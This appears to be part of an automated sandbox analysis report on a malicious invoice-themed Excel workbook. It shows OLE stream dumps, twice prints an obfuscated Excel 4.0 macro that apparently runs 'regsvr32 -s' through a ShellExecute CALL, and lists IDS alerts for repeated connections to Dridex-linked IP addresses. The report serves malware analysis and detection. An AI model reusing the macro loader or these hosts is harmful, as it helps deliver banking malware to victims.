Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	363
Entropy:	2.21122978445
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	398
Entropy:	2.07709195049
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 820

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	820
Entropy:	6.49145935167
Base64 Encoded:	True
Data ASCII:	. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 09 a2 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

OLE File "/opt/package/joesandbox/database/analysis/338309/sample/INV2680371456-20210111889374.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Author:
Last Saved By:
Create Time:	2020-12-07T14:38:21Z
Last Saved Time:	2021-01-11T14:32:26Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0300

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 115

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	115
Entropy:	4.80096587863
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: f, File Type: data, Stream Size: 178

General
Stream Path:	f
File Type:	data
Stream Size:	178
Entropy:	2.56223021678
Base64 Encoded:	False
Data ASCII:	. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
Data Raw:	00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	i02/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/f, File Type: data, Stream Size: 40

General
Stream Path:	i02/f
File Type:	data
Stream Size:	40
Entropy:	1.54176014818
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i02/o, File Type: empty, Stream Size: 0

General
Stream Path:	i02/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	i03/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/f, File Type: data, Stream Size: 40

General
Stream Path:	i03/f
File Type:	data
Stream Size:	40
Entropy:	1.90677964945
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: i03/o, File Type: empty, Stream Size: 0

General
Stream Path:	i03/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: o, File Type: data, Stream Size: 152

General
Stream Path:	o
File Type:	data
Stream Size:	152
Entropy:	2.68720470607
Base64 Encoded:	False
Data ASCII:	. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
Data Raw:	00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80

Stream Path: x, File Type: data, Stream Size: 48

General
Stream Path:	x
File Type:	data
Stream Size:	48
Entropy:	1.42267983198
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/12/21-01:43:58.265168	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49166	77.220.64.37	192.168.2.22
01/12/21-01:44:01.015768	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49168	80.86.91.27	192.168.2.22
01/12/21-01:44:01.606814	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49169	5.100.228.233	192.168.2.22
01/12/21-01:44:01.606814	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49169	5.100.228.233	192.168.2.22
01/12/21-01:44:02.725135	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49171	77.220.64.37	192.168.2.22
01/12/21-01:44:03.248611	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49172	80.86.91.27	192.168.2.22
01/12/21-01:44:03.773777	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49173	5.100.228.233	192.168.2.22
01/12/21-01:44:03.773777	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49173	5.100.228.233	192.168.2.22
01/12/21-01:44:04.816543	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49175	77.220.64.37	192.168.2.22
01/12/21-01:44:05.342645	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49176	80.86.91.27	192.168.2.22
01/12/21-01:44:05.861566	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49177	5.100.228.233	192.168.2.22
01/12/21-01:44:05.861566	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49177	5.100.228.233	192.168.2.22
01/12/21-01:44:06.899440	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49179	77.220.64.37	192.168.2.22
01/12/21-01:44:07.433882	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49180	80.86.91.27	192.168.2.22
01/12/21-01:44:07.976250	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49181	5.100.228.233	192.168.2.22
01/12/21-01:44:07.976250	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49181	5.100.228.233	192.168.2.22
01/12/21-01:44:09.036133	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49183	77.220.64.37	192.168.2.22
01/12/21-01:44:09.566865	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49184	80.86.91.27	192.168.2.22
01/12/21-01:44:10.076718	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49185	5.100.228.233	192.168.2.22
01/12/21-01:44:10.076718	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49185	5.100.228.233	192.168.2.22
01/12/21-01:44:11.132100	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49187	77.220.64.37	192.168.2.22
01/12/21-01:44:11.645475	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49188	80.86.91.27	192.168.2.22
01/12/21-01:44:12.172173	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49189	5.100.228.233	192.168.2.22
01/12/21-01:44:12.172173	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49189	5.100.228.233	192.168.2.22
01/12/21-01:44:13.200539	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49191	77.220.64.37	192.168.2.22
01/12/21-01:44:13.712604	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49192	80.86.91.27	192.168.2.22
01/12/21-01:44:14.238930	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49193	5.100.228.233	192.168.2.22
01/12/21-01:44:14.238930	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49193	5.100.228.233	192.168.2.22
01/12/21-01:44:15.545794	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49195	77.220.64.37	192.168.2.22
01/12/21-01:44:16.092017	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49196	80.86.91.27	192.168.2.22
01/12/21-01:44:16.606197	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49197	5.100.228.233	192.168.2.22
01/12/21-01:44:16.606197	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49197	5.100.228.233	192.168.2.22
01/12/21-01:44:18.668025	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49199	77.220.64.37	192.168.2.22
01/12/21-01:44:19.192309	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49200	80.86.91.27	192.168.2.22
01/12/21-01:44:19.719108	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49201	5.100.228.233	192.168.2.22
01/12/21-01:44:19.719108	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49201	5.100.228.233	192.168.2.22
01/12/21-01:44:20.782259	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49203	77.220.64.37	192.168.2.22
01/12/21-01:44:21.313052	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49204	80.86.91.27	192.168.2.22
01/12/21-01:44:21.845259	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49205	5.100.228.233	192.168.2.22
01/12/21-01:44:21.845259	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49205	5.100.228.233	192.168.2.22
01/12/21-01:44:22.895057	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49207	77.220.64.37	192.168.2.22
01/12/21-01:44:23.405578	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49208	80.86.91.27	192.168.2.22
01/12/21-01:44:23.953654	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49209	5.100.228.233	192.168.2.22
01/12/21-01:44:23.953654	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49209	5.100.228.233	192.168.2.22
01/12/21-01:44:25.002498	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49211	77.220.64.37	192.168.2.22
01/12/21-01:44:25.530736	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49212	80.86.91.27	192.168.2.22
01/12/21-01:44:26.056875	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49213	5.100.228.233	192.168.2.22
01/12/21-01:44:26.056875	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49213	5.100.228.233	192.168.2.22
01/12/21-01:44:27.108377	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49215	77.220.64.37	192.168.2.22
01/12/21-01:44:27.632953	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49216	80.86.91.27	192.168.2.22
01/12/21-01:44:28.141501	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49217	5.100.228.233	192.168.2.22
01/12/21-01:44:28.141501	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49217	5.100.228.233	192.168.2.22
01/12/21-01:44:29.176541	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49219	77.220.64.37	192.168.2.22
01/12/21-01:44:29.707201	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49220	80.86.91.27	192.168.2.22
01/12/21-01:44:30.215452	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49221	5.100.228.233	192.168.2.22
01/12/21-01:44:30.215452	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49221	5.100.228.233	192.168.2.22
01/12/21-01:44:31.256057	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49223	77.220.64.37	192.168.2.22
01/12/21-01:44:31.788343	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49225	80.86.91.27	192.168.2.22
01/12/21-01:44:32.313060	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49226	5.100.228.233	192.168.2.22
01/12/21-01:44:32.313060	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49226	5.100.228.233	192.168.2.22
01/12/21-01:44:33.550778	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49229	77.220.64.37	192.168.2.22
01/12/21-01:44:34.681061	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49230	80.86.91.27	192.168.2.22
01/12/21-01:44:35.362624	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49231	5.100.228.233	192.168.2.22
01/12/21-01:44:35.362624	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49231	5.100.228.233	192.168.2.22
01/12/21-01:44:36.422943	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49233	77.220.64.37	192.168.2.22
01/12/21-01:44:36.946269	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49234	80.86.91.27	192.168.2.22
01/12/21-01:44:37.479110	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49235	5.100.228.233	192.168.2.22
01/12/21-01:44:37.479110	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49235	5.100.228.233	192.168.2.22
01/12/21-01:44:38.558764	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49237	77.220.64.37	192.168.2.22
01/12/21-01:44:39.085287	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49238	80.86.91.27	192.168.2.22
01/12/21-01:44:39.621599	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49239	5.100.228.233	192.168.2.22
01/12/21-01:44:39.621599	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49239	5.100.228.233	192.168.2.22
01/12/21-01:44:40.655749	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49241	77.220.64.37	192.168.2.22
01/12/21-01:44:41.192565	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49242	80.86.91.27	192.168.2.22
01/12/21-01:44:41.709332	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49243	5.100.228.233	192.168.2.22
01/12/21-01:44:41.709332	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49243	5.100.228.233	192.168.2.22
01/12/21-01:44:42.762681	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49245	77.220.64.37	192.168.2.22
01/12/21-01:44:43.286682	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49246	80.86.91.27	192.168.2.22
01/12/21-01:44:43.812850	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49247	5.100.228.233	192.168.2.22
01/12/21-01:44:43.812850	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49247	5.100.228.233	192.168.2.22
01/12/21-01:44:44.949043	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49249	77.220.64.37	192.168.2.22
01/12/21-01:44:45.502620	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49250	80.86.91.27	192.168.2.22
01/12/21-01:44:46.036344	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49251	5.100.228.233	192.168.2.22
01/12/21-01:44:46.036344	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49251	5.100.228.233	192.168.2.22
01/12/21-01:44:47.099344	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49253	77.220.64.37	192.168.2.22
01/12/21-01:44:47.623986	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49254	80.86.91.27	192.168.2.22
01/12/21-01:44:48.146230	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49255	5.100.228.233	192.168.2.22
01/12/21-01:44:48.146230	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49255	5.100.228.233	192.168.2.22
01/12/21-01:44:49.200660	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49257	77.220.64.37	192.168.2.22
01/12/21-01:44:49.730973	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49258	80.86.91.27	192.168.2.22
01/12/21-01:44:50.258776	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49259	5.100.228.233	192.168.2.22
01/12/21-01:44:50.258776	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49259	5.100.228.233	192.168.2.22
01/12/21-01:44:51.536021	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49261	77.220.64.37	192.168.2.22
01/12/21-01:44:52.459368	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49262	80.86.91.27	192.168.2.22
01/12/21-01:44:53.023442	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49263	5.100.228.233	192.168.2.22
01/12/21-01:44:53.023442	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49263	5.100.228.233	192.168.2.22
01/12/21-01:44:54.069024	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49265	77.220.64.37	192.168.2.22
01/12/21-01:44:54.586272	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49266	80.86.91.27	192.168.2.22
01/12/21-01:44:55.105278	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49267	5.100.228.233	192.168.2.22
